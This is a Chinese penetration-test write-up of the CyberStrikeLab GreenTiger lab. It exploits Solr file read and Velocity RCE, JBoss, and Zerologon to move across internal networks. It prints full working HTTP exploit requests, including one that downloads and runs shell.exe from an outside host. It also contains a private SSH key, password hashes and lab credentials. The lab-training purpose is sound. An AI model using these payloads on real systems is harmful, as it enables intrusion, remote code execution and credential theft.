CyberStrikeLab-GreenTiger-Wp
字数 1425 2025-09-01 11:26:17
CyberStrikeLab GreenTiger 靶场渗透测试报告
1. 初始信息收集
- 目标IP:
172.5.5.5 - 开放端口和服务:
- 80/tcp: Apache Solr服务
- 135/tcp: Microsoft Windows RPC
- 139/tcp: NetBIOS
- 445/tcp: SMB
- 5985/tcp: WinRM (HTTPAPI)
2. Solr服务漏洞利用
2.1 任意文件读取漏洞 (CVE-2024-45216)
漏洞验证:
POST /solr/cslab/debug/dump:/admin/info/key?param=ContentStreams&stream.url=file:///flag.txt HTTP/1.1
Host: 172.5.5.5
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml
Connection: keep-alive
SolrAuth: test
Content-Type: application/json
Content-Length: 0
成功响应:
{
"responseHeader":{...},
"streams":[
{...},
{
"stream":" _____ _______ _ \r\n / ____| |__ __(_) \r\n | | __ _ __ ___ ___ _ __ | | _ __ _ ___ _ __ \r\n | | |_ | '__/ _ \\/ _ \\ '_ \\| | | |/ _` |/ _ \\ '__|\r\n | |__| | | | __/ __/ | | | | | | (_| | __/ | \r\n \\_____|_| \\___|\\___|_| |_|_| |_|\\__, |\\___|_| \r\n __/ | \r\n |___/ \r\nGreenTiger-cslab{97bcad867}"
}
]
}
获取flag1: GreenTiger-cslab{97bcad867}
2.2 远程代码执行漏洞
步骤1: 获取节点名称
POST /solr/admin/cores:/admin/info/key?indexInfo=false&wt=json HTTP/1.1
Host: 172.5.5.5
User-Agent: python-requests/2.27.1
Content-Length: 0
响应确认节点名称为cslab
步骤2: 修改Solr配置
POST /solr/cslab/config HTTP/1.1
Host: 172.5.5.5
Content-Type: application/json
Content-Length: 363
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
步骤3: 执行命令
GET /solr/cslab/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: 172.5.5.5
User-Agent: curl/8.1.2
3. 权限提升与横向移动
3.1 获取系统权限
下载并执行恶意载荷:
GET /solr/cslab/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27powershell%20-c%20curl%20172.16.233.2/shell.exe%20-O%20shell.exe%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
执行载荷:
GET /solr/cslab/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27shell.exe%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
3.2 获取凭证信息
修改管理员密码:
net user administrator passw0rd@1234
获取哈希值:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:544bb46748b4972b7566995e6eb29bdb:::
3.3 发现新网段
IP配置信息:
以太网适配器 以太网实例:
IPv4 地址 . . . . . . . . . . . . : 172.5.5.5
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 172.5.5.233
以太网适配器 以太网实例 0:
IPv4 地址 . . . . . . . . . . . . : 172.6.6.5
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 172.6.6.1
4. 横向移动到172.6.6.0/24网段
4.1 扫描结果
[+] 端口开放 172.6.6.8:445
[+] 端口开放 172.6.6.8:139
[+] 端口开放 172.6.6.8:135
[+] 端口开放 172.6.6.8:80
[+] 端口开放 172.6.6.8:5985
[+] 端口开放 172.6.6.8:8080 (JBoss)
4.2 JBoss漏洞利用 (CVE-2017-12149)
发现JBoss服务在8080端口
利用工具: CVE-2017-12149 Exploit
4.3 获取SSH私钥
在C:\Users\Administrator\.ollama目录下发现:
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZWQyNTUxOQAAACB/UrRhCTDNLTm5XXxSKdQzBvhbfr1wU3D7DVZab0/cEgAAAIjVcO0A1XDtAAAAAAtzc2gtZWQyNTUxOQAAACB/UrRhCTDNLTm5XXxSKdQzBvhbfr1wU3D7DVZab0/cEgAAAED4+EWX+1SQPqS276eHKFlWjVq/AqTR3iwnt33y4voOkX9StGEJMM0tObldfFIp1DMG+Ft+vXBTcPsNVlpvT9wSAAAAAAECAwQF
-----END OPENSSH PRIVATE KEY-----
对应公钥:
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH9StGEJMM0tObldfFIp1DMG+Ft+vXBTcPsNVlpvT9wS
4.4 获取自动登录凭证
通过winpeas或直接查询注册表获取自动登录凭证:
cslabwow : cyber@w0w
获取flag2
5. 横向移动到10.8.8.0/24网段
5.1 发现WSUS服务器 (10.8.8.60)
利用WSUS漏洞进行横向移动
参考:
5.2 非预期解 - Zerologon攻击
步骤:
- 使用zerologon漏洞将DC$的hash置空
- 备份注册表:
reg save HKLM\SYSTEM system.backup - 下载注册表备份
- 获取原始密码hash:
50176188318d8b122f6d60e0170f906c - 恢复密码
- 验证hash已恢复
获取flag4
6. 总结
关键漏洞利用链
- Solr任意文件读取 (CVE-2024-45216) → 获取flag1
- Solr Velocity模板注入 → RCE → 系统权限
- 内网信息收集 → 发现新网段172.6.6.0/24
- JBoss反序列化 (CVE-2017-12149) → 获取SSH私钥
- 自动登录凭证收集 → 获取flag2
- WSUS漏洞或Zerologon → 域控权限 → 获取flag4
关键命令总结
- Solr文件读取:
POST /solr/cslab/debug/dump:/admin/info/key?param=ContentStreams&stream.url=file:///flag.txt - Solr RCE: Velocity模板注入payload
- 哈希获取:
hashdump - 网络发现:
ipconfig,netstat -ano,fscan扫描 - 横向移动: WSUS漏洞或Zerologon攻击
防御建议
- 及时更新Solr到最新版本
- 禁用Solr Velocity模板功能
- 加强内网隔离,限制横向移动
- 定期检查自动登录凭证
- 及时安装WSUS和域控相关补丁
- 监控异常的网络流量和认证请求